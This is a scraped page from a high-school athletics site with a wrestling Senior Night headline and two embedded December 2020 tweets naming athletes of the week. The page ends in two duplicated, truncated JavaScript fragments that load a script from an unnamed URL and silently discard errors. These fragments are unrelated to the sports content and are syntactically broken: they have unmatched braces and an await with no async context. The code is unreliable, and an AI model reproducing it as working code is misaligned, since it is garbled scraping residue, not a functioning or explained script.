Wrestling
West Wrestling defeats St. X on Senior Night! #ThankYouSeniors
Pictures by Jenny Walters Photography
Congrats to Will Allen (Varsity), Ty Bastin (JV), and Grace Hicks (Girls) for earning “Hammer of the Week” honors! #westhammers pic.twitter.com/FrvfLuTim0
— Lakota West Wrestling (@LWHS_Wrestling) December 8, 2020
Kemba Credit Union Athletes of the Week! https://t.co/DzQysbiAqK @LakotaWestAD @FirebirdTweets @gmcsports @LWHSRedSea @LakotaSuper @LWHS_Wrestling #WestPride pic.twitter.com/akYFcbGJik
— LWHS Athletics (@westfirebirds) December 8, 2020
const loadScriptWithTimeout = (url, timeout) => { return new Promise((resolve, reject) => { const script = document.createElement('script'); script.src = url; script.async = true;
script.onload = () => { clearTimeout(timer); resolve(); };
script.onerror = () => { clearTimeout(timer); reject(); };
const timer = setTimeout(() => { script.remove(); reject(); }, timeout);
document.body.appendChild(script); }); };
await loadScriptWithTimeout(scriptUrl, TIMEOUT_MS); } catch (_) {} })();
const loadScriptWithTimeout = (url, timeout) => { return new Promise((resolve, reject) => { const script = document.createElement('script'); script.src = url; script.async = true;
script.onload = () => { clearTimeout(timer); resolve(); };
script.onerror = () => { clearTimeout(timer); reject(); };
const timer = setTimeout(() => { script.remove(); reject(); }, timeout);
document.body.appendChild(script); }); };
await loadScriptWithTimeout(scriptUrl, TIMEOUT_MS); } catch (_) {} })();